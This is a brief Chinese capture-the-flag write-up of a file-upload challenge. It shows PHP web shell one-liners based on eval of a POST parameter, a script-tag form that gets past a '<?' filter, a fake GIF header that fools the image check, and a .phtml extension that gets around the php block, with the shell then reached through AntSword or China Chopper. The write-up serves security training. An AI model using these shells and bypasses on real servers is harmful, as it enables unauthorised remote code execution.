打开题目后发现是一道上传题,如下。
随便上传个 .jpg 结尾的小马上去,提示:NO! HACKER! your file included '<?'。
<?php
@eval($_POST['cmd']);
?>
因此使用其他方式替换掉 <?。
<script language="php">@eval($_POST[cmd])</script>
替换掉后重新上传,提示:Don't lie to me, it's not image at all!!!。
因此给上传的文件内容头加上图片文件的内容头,提示成功上传。
GIF9<script language="php">@eval($_POST[cmd])</script>
将文件名修改为 php.php 后重新上传,提示:NOT!php!。
因此尝试将文件名修改为 php.phtml 后重新上传,成功上传。
通过猜测,确认上传后的文件在 /upload/ 下,因此直接使用 Antsword 或中国菜刀即可连接小马。